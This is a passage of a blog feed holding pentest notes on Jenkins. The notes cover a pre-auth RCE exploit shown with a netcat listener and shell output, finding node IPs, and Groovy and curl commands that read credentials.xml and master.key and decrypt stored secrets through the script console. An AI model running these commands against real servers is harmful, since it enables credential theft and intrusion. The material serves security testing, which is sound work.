Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/2715327188736957907"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/2715327188736957907"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2019\/03\/jenkins-cve-2018-1000600-poc.html","title":"Jenkins - CVE-2018-1000600 PoC"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-6814904859046744361"},"published":{"$t":"2019-03-04T22:26:00.000-05:00"},"updated":{"$t":"2019-03-04T22:26:46.045-05:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"devops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"jenkins"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"Jenkins - messing with exploits pt3 - CVE-2019-1003000"},"content":{"type":"html","$t":"\u003Cspan style=\"color: #444444;\"\u003EReferences:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Ca href=\"https:\/\/www.exploit-db.com\/exploits\/46453\" target=\"_blank\"\u003E\u003Cspan style=\"color: #444444;\"\u003Ehttps:\/\/www.exploit-db.com\/exploits\/46453\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Ca href=\"http:\/\/blog.orange.tw\/2019\/02\/abusing-meta-programming-for-unauthenticated-rce.html\" target=\"_blank\"\u003E\u003Cspan style=\"color: #444444;\"\u003Ehttp:\/\/blog.orange.tw\/2019\/02\/abusing-meta-programming-for-unauthenticated-rce.html\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EThis post covers the Orange Tsai Jenkins pre-auth exploit\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EVuln versions: Jenkins \u0026lt; 2.137 (preauth)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EPipeline: Declarative Plugin up to and including 1.3.4\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003EPipeline: Groovy Plugin up to and including 2.61\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003EScript Security Plugin up to and including 1.49\u0026nbsp; (in CG's testing 1.50 is also vuln)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EThe exploitdb link above lists a nice self contained exploit that will compile the jar for you and serve it up for retrieval by the vulnerable Jenkins server.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/3.bp.blogspot.com\/-qo5Ss-IiJGQ\/XH3pDM_RZPI\/AAAAAAAACdI\/LPkkA2DKadYtNYoZxVOvybxeELBgEDsgwCLcBGAs\/s1600\/Screen%2BShot%2B2019-03-04%2Bat%2B10.10.59%2BPM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cimg border=\"0\" data-original-height=\"409\" data-original-width=\"1600\" height=\"162\" src=\"https:\/\/3.bp.blogspot.com\/-qo5Ss-IiJGQ\/XH3pDM_RZPI\/AAAAAAAACdI\/LPkkA2DKadYtNYoZxVOvybxeELBgEDsgwCLcBGAs\/s640\/Screen%2BShot%2B2019-03-04%2Bat%2B10.10.59%2BPM.png\" width=\"640\" \/\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: Courier New, Courier, monospace;\"\u003Enc -l 8888 -vv\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: Courier New, Courier, monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: Courier New, Courier, monospace;\"\u003Ewhoami\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: Courier New, Courier, monospace;\"\u003Ebash: no job control in this shell\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: Courier New, Courier, monospace;\"\u003E\u0026nbsp;bash-3.2$ jenkins\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: Times, Times New Roman, serif;\"\u003EAfter Jenkins 2.138 the preauth is gone but if you have\u0026nbsp; an overall read token and the plugins are still vulnerable you can still exploit that server.\u0026nbsp; You can just add your cookie to the script and it will hit the url with your authenticated cookie and you can still exploit the server.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: Times, Times New Roman, serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/4.bp.blogspot.com\/-8_fH47cEmSc\/XH3rvO2I6gI\/AAAAAAAACdU\/6yojCGErMMIxcjntOlpENLfStQ_icA-PgCLcBGAs\/s1600\/Screen%2BShot%2B2019-03-04%2Bat%2B10.21.38%2BPM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cimg border=\"0\" data-original-height=\"244\" data-original-width=\"1112\" height=\"87\" src=\"https:\/\/4.bp.blogspot.com\/-8_fH47cEmSc\/XH3rvO2I6gI\/AAAAAAAACdU\/6yojCGErMMIxcjntOlpENLfStQ_icA-PgCLcBGAs\/s400\/Screen%2BShot%2B2019-03-04%2Bat%2B10.21.38%2BPM.png\" width=\"400\" \/\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cspan style=\"font-family: Times, Times New Roman, serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/6814904859046744361\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment.g?blogID=8539880144347728238\u0026postID=6814904859046744361","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/6814904859046744361"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/6814904859046744361"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2019\/03\/jenkins-messing-with-exploits-pt3-cve.html","title":"Jenkins - messing with exploits pt3 - CVE-2019-1003000"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"https:\/\/3.bp.blogspot.com\/-qo5Ss-IiJGQ\/XH3pDM_RZPI\/AAAAAAAACdI\/LPkkA2DKadYtNYoZxVOvybxeELBgEDsgwCLcBGAs\/s72-c\/Screen%2BShot%2B2019-03-04%2Bat%2B10.10.59%2BPM.png","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-8575904409576959407"},"published":{"$t":"2019-03-04T21:16:00.002-05:00"},"updated":{"$t":"2019-03-04T21:16:15.412-05:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"devops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"jenkins"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"Jenkins - Identify IP Addresses of nodes"},"content":{"type":"html","$t":"\u003Cspan style=\"color: #444444;\"\u003EWhile doing some research I found several posts on stackoverflow asking how to identify the IP address of nodes.\u0026nbsp; You might want to know this if you read the \u003Ca href=\"https:\/\/carnal0wnage.attackresearch.com\/2019\/02\/jenkins-decrypting-credentialsxml.html\" target=\"_blank\"\u003Edecrypting credentials post\u003C\/a\u003E\u0026nbsp;and managed to get yourself some ssh keys for nodes but you cant actually see the node's IP in the Jenkins UI.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EStackoverflow link:\u0026nbsp;\u003Ca href=\"https:\/\/stackoverflow.com\/questions\/14930329\/finding-ip-of-a-jenkins-node\" target=\"_blank\"\u003Ehttps:\/\/stackoverflow.com\/questions\/14930329\/finding-ip-of-a-jenkins-node\u003C\/a\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003Eblog on setting up a node:\u0026nbsp;\u003Ca href=\"https:\/\/embeddedartistry.com\/blog\/2017\/12\/22\/jenkins-configuring-a-linux-slave-node\" target=\"_blank\"\u003Ehttps:\/\/embeddedartistry.com\/blog\/2017\/12\/22\/jenkins-configuring-a-linux-slave-node\u003C\/a\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u0026nbsp;There are great answers in the stackoverflow post on using the script console but in the event you found yourself with just the Jenkins directory or no access to the script console it's pretty easy to get this information.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EYou can just browse to \u003Cspan style=\"font-family: Courier New, Courier, monospace;\"\u003Ejenkins-ip\/computer\/$nodename\/config.xml\u003C\/span\u003E. This request will require the \u003Cb\u003Eextended read \u003C\/b\u003Epermission.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/1.bp.blogspot.com\/-Uz7_5fuo2L8\/XH3bkgO-sJI\/AAAAAAAACc8\/alV9FCx4fzkBbas-bIZ2YmDQ1AxHqH8PwCLcBGAs\/s1600\/Screen%2BShot%2B2019-03-04%2Bat%2B9.14.23%2BPM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cimg border=\"0\" data-original-height=\"636\" data-original-width=\"1600\" height=\"254\" src=\"https:\/\/1.bp.blogspot.com\/-Uz7_5fuo2L8\/XH3bkgO-sJI\/AAAAAAAACc8\/alV9FCx4fzkBbas-bIZ2YmDQ1AxHqH8PwCLcBGAs\/s640\/Screen%2BShot%2B2019-03-04%2Bat%2B9.14.23%2BPM.png\" width=\"640\" \/\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003C\/div\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EOptionally if you are on the box\u0026nbsp; or have a backup you can go to \u003Cspan style=\"font-family: Courier New, Courier, monospace;\"\u003Ejenkins-dir\/nodes\/$nodename\/config.xml\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: Courier New, Courier, monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/8575904409576959407\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment.g?blogID=8539880144347728238\u0026postID=8575904409576959407","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/8575904409576959407"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/8575904409576959407"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2019\/03\/jenkins-identify-ip-addresses-of-nodes.html","title":"Jenkins - Identify IP Addresses of nodes"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"https:\/\/1.bp.blogspot.com\/-Uz7_5fuo2L8\/XH3bkgO-sJI\/AAAAAAAACc8\/alV9FCx4fzkBbas-bIZ2YmDQ1AxHqH8PwCLcBGAs\/s72-c\/Screen%2BShot%2B2019-03-04%2Bat%2B9.14.23%2BPM.png","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-7807981096117925435"},"published":{"$t":"2019-02-28T10:22:00.001-05:00"},"updated":{"$t":"2019-04-08T16:34:04.155-04:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"devops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"jenkins"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"Jenkins - decrypting credentials.xml"},"content":{"type":"html","$t":"\u003Cspan style=\"color: #444444;\"\u003EIf you find yourself on a Jenkins box with script console access you can decrypt the saved passwords in credentials.xml in the following way:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Ehashed_pw='$PASSWORDHASH'\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Epasswd = hudson.util.Secret.decrypt(hashed_pw)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Eprintln(passwd)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EYou need to perform this on the the Jenkins system itself as it's using the local \u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Emaster.key\u003C\/span\u003E and\u0026nbsp;\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Ehudson.util.Secret\u003C\/span\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003EScreenshot below\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/2.bp.blogspot.com\/-XMzdnnVjnMU\/XHf3SeLpK9I\/AAAAAAAACb0\/3ZNuHXY9DHUzsFYaz5Flcn-hJL_VEDp_ACLcBGAs\/s1600\/Screen%2BShot%2B2019-02-28%2Bat%2B9.55.48%2BAM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cimg border=\"0\" data-original-height=\"914\" data-original-width=\"1600\" height=\"364\" src=\"https:\/\/2.bp.blogspot.com\/-XMzdnnVjnMU\/XHf3SeLpK9I\/AAAAAAAACb0\/3ZNuHXY9DHUzsFYaz5Flcn-hJL_VEDp_ACLcBGAs\/s640\/Screen%2BShot%2B2019-02-28%2Bat%2B9.55.48%2BAM.png\" width=\"640\" \/\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003ECode to get the credentials.xml from the script console\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003EWindows\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edef sout = new StringBuffer(), serr = new StringBuffer()\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edef proc = 'cmd.exe \/c type credentials.xml'.execute()\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Eproc.consumeProcessOutput(sout, serr)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Eproc.waitForOrKill(1000)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cspan style=\"color: #444444;\"\u003Eprintln \"out\u0026gt; $sout err\u0026gt; $serr\"\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E*nix\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edef sout = new StringBuffer(), serr = new StringBuffer()\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edef proc = 'cat credentials.xml'.execute()\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Eproc.consumeProcessOutput(sout, serr)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Eproc.waitForOrKill(1000)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cspan style=\"color: #444444;\"\u003Eprintln \"out\u0026gt; $sout err\u0026gt; $serr\"\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/3.bp.blogspot.com\/-WXeauvEkywk\/XHf4GLRLdeI\/AAAAAAAACb8\/VQSKXBF4mo4TM_gVID86Tw-eFwZ6AL0AwCLcBGAs\/s1600\/Screen%2BShot%2B2019-02-28%2Bat%2B10.02.18%2BAM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cimg border=\"0\" data-original-height=\"840\" data-original-width=\"1566\" height=\"342\" src=\"https:\/\/3.bp.blogspot.com\/-WXeauvEkywk\/XHf4GLRLdeI\/AAAAAAAACb8\/VQSKXBF4mo4TM_gVID86Tw-eFwZ6AL0AwCLcBGAs\/s640\/Screen%2BShot%2B2019-02-28%2Bat%2B10.02.18%2BAM.png\" width=\"640\" \/\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003EIf you just want to do it with curl you can hit the scriptText endpoint and do something like this:\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003E\u003Cbr \/\u003EWindows:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Ecurl -u admin:admin http:\/\/10.0.0.160:8080\/scriptText --data \"script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cmd.exe+\/c+type+credentials.xml%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22\u0026amp;Submit=Run\"\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003EAlso because this syntax took me a minute to figure out for files in subdirectories:\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Ecurl -u admin:admin http:\/\/10.0.0.160:8080\/scriptText --data \"script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cmd.exe+\/c+type+\u003Cb\u003Es\u003C\/b\u003E\u003Cb\u003Eecrets%5C\\master.key\u003C\/b\u003E%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22\u0026amp;Submit=Run\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E*nix\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Ecurl -u admin:admin http:\/\/10.0.0.160:8080\/scriptText --data \"script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cat+credentials.xml%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22\u0026amp;Submit=Run\"\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EThen to decrypt any passwords:\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Ecurl -u admin:admin http:\/\/10.0.0.160:8080\/scriptText --data \"script=println(hudson.util.Secret.fromString('7pXrOOFP1XG62UsWyeeSI1m06YaOFI3s26WVkOsTUx0=').getPlainText())\"\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/1.bp.blogspot.com\/-qOLgLcsmpMg\/XHf42TtlZfI\/AAAAAAAACcI\/7__Lv3DkD4E-Y9YhhM_8VjqulPWP9EwQwCLcBGAs\/s1600\/Screen%2BShot%2B2019-02-28%2Bat%2B10.04.59%2BAM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cimg border=\"0\" data-original-height=\"111\" data-original-width=\"1600\" height=\"44\" src=\"https:\/\/1.bp.blogspot.com\/-qOLgLcsmpMg\/XHf42TtlZfI\/AAAAAAAACcI\/7__Lv3DkD4E-Y9YhhM_8VjqulPWP9EwQwCLcBGAs\/s640\/Screen%2BShot%2B2019-02-28%2Bat%2B10.04.59%2BAM.png\" width=\"640\" \/\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003EIf you are in a position where you have the files but no access to jenkins you can use:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/github.com\/tweksteen\/jenkins-decrypt\" target=\"_blank\"\u003E\u003Cspan style=\"color: #444444;\"\u003Ehttps:\/\/github.com\/tweksteen\/jenkins-decrypt\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: 